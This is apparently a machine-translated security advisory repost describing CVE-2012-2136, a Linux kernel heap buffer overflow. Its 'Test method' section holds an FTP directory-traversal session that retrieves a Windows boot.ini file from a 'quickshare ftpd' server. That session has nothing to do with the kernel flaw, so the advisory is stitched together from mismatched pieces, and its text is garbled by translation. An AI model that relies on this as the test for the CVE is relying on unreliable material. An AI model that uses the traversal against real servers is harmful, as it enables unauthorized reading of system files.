Release date:
Updated on:
Affected Systems:
Linux kernel 2.6.x
Description:
--------------------------------------------------------------------------------
Bugtraq id: 53721
Cve id: CVE-2012-2136
Linux Kernel is the Kernel of the Linux operating system.
Linux kernel does not verify the data_len parameter of the sock_alloc_send_pskb () function before setting the frag of the allocated skb. The heap buffer overflow vulnerability exists in the implementation, attackers can exploit this vulnerability to execute arbitrary code with the superuser permission to completely control the affected computers.
<* Source: Red Hat
Link: https://bugzilla.redhat.com/show_bug.cgi? Id = 816289
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Www.bkjia.com @ bkjia :~ $ Ftp 10.5.5.27
Connected to 10.5.5.27.
220 quickshare ftpd ready.
Name (10.5.5.27: modpr0be): ftpuser
331 User name okay, need password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
Ftp> get.../../boot. ini boot. ini
Local: boot. ini remote: ../boot. ini
200 PORT command successful. Consider using PASV.
150 Opening BINARY connection.
226 File send OK.
211 bytes encoded ed in 0.00 secs (127.0 kB/s)
Ftp> quit
221 Goodbye.
Www.bkjia.com @ bkjia :~ $ Cat boot. ini
[Boot loader]
Timeout = 30
Default = multi (0) disk (0) rdisk (0) partition (1) \ WINDOWS
[Operating systems]
Multi (0) disk (0) rdisk (0) partition (1) \ WINDOWS = "Microsoft Windows XP Professional"/noexecute = optin
/Fastdetect
Www.bkjia.com @ bkjia :~ $
# Eof
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Linux
-----
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
Http://www.kernel.org/